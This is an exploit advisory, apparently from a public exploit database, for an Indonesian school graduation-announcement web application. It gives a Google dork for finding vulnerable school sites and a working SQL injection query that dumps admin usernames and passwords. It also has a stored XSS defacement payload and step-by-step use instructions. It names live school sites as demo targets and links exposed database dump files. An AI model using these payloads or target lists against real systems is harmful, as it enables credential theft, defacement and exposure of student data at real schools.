Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability

2020.10.05
id Gh05t666nero (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan

#Exploit Title: Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability #Date: 2020-09-09 #Exploit Author: Gh05t666nero #Vendor Homepage: https://github.com/slametbsan #Google Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan #Category: webapps #Tested On: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01) #Software Link: https://github.com/slametbsan/kelulusan/archive/kelulusan.zip ############################################# [*] SQL Injection #Query: Gh05t666nero' or'1'=1 And/**/.0union/*%26*/distinctROW select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(un_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),2,3,4,5,6,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()),8# #Demo: Demo 1: http://pengumuman.smkn1nabire.sch.id Demo 2: http://smkn2bulik.sch.id/kelulusan Demo 3: http://smkn2sampang.sch.id/kelulusan/19 #Proof of Concept: Do a search using the dork provided above, then do the vulnerability exploitation using the Query that I have listed above. Copy the Query and paste it in the form section in the middle of the page then submit the Query code, it will automatically dump the username|password that is in the site's database. #Login Page: For the login page section, just add the path /admin ############################################# [*] Cross Site Scripting [STORED] #Payload: <br><h1 style="color:green; text-align:center;">Poisoned by Gh05t666nero</h1> #Proof of concept: Enter the admin dashboard using the credentials from the SQL vulnerability exploitation that I described above then enter the Konfigurasi menu. Before entering the XSS Payload, click the Edit button first. After that, please enter the XSS Payload on the Nama Sekolah form then click the save button, the Payload will be executed and stored. ############################################# [*] Database Information Disclosure #Example Bug: http://www.mikrotik.smkn3garut.sch.id/un2016.sql http://smkn2bulik.sch.id/kelulusan/un2016.sql http://kelulusan.smkn1jati.sch.id/un2016.sql ############################################# Contact Me:- gh05t666nero@gmail.com Instagram:- @ojan_xploit Telegram:- @Gh05t666nero1


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top